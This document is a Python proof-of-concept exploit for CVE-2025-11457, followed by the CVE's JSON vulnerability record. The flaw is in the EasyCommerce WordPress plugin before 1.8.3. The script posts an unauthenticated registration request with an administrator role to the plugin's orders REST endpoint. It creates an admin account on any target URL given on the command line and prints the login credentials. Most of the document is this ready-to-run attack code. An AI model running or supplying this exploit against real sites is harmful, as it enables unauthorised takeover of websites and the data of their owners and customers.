CVE-2025-11457

import requests import json import sys # CVE-2025-11457 PoC - EasyCommerce WordPress Plugin Privilege Escalation # Target: WordPress site with EasyCommerce plugin < 1.8.3 # Impact: Unauthenticated attacker gains administrator access def exploit_privilege_escalation(target_url): """ Exploit the privilege escalation vulnerability in EasyCommerce plugin. The /easycommerce/v1/orders REST API endpoint allows role selection during registration. """ api_endpoint = f"{target_url.rstrip('/')}/wp-json/easycommerce/v1/orders" # Malicious payload to register as administrator payload = { 'email': '[email protected]', 'username': 'hacker_admin', 'password': 'P@ssw0rd123!', 'role': 'administrator', # Privilege escalation - requesting admin role 'first_name': 'Attacker', 'last_name': 'User' } headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting API endpoint: {api_endpoint}") print(f"[*] Sending malicious registration request...") response = requests.post( api_endpoint, json=payload, headers=headers, timeout=30, verify=False ) print(f"[*] Response Status: {response.status_code}") if response.status_code in [200, 201]: print("[+] SUCCESS: Administrator account created!") print(f"[+] Username: hacker_admin") print(f"[+] Password: P@ssw0rd123!") print("[+] Login at: {}/wp-admin".format(target_url.rstrip('/'))) return True else: print(f"[-] Failed: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-11457.py <target_url>") print("Example: python cve-2025-11457.py https://victim.com") sys.exit(1) target = sys.argv[1] exploit_privilege_escalation(target)

{"cve": {"id": "CVE-2025-11457", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:41.627", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The EasyCommerce – AI-Powered, Fast & Beautiful WordPress Ecommerce Plugin plugin for WordPress is vulnerable to Privilege Escalation in versions 0.9.0-beta2 to 1.8.2. This is due to the /easycommerce/v1/orders REST API endpoint not properly restricting the ability for users to select roles during registration. This makes it possible for unauthenticated attackers to gain administrator-level access to a vulnerable site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3392029/easycommerce/trunk/app/Abstracts/User.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/easycommerce/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ebe84ba-abc1-410c-b315-118746ff235a?source=cve", "source": "[email protected]"}]}}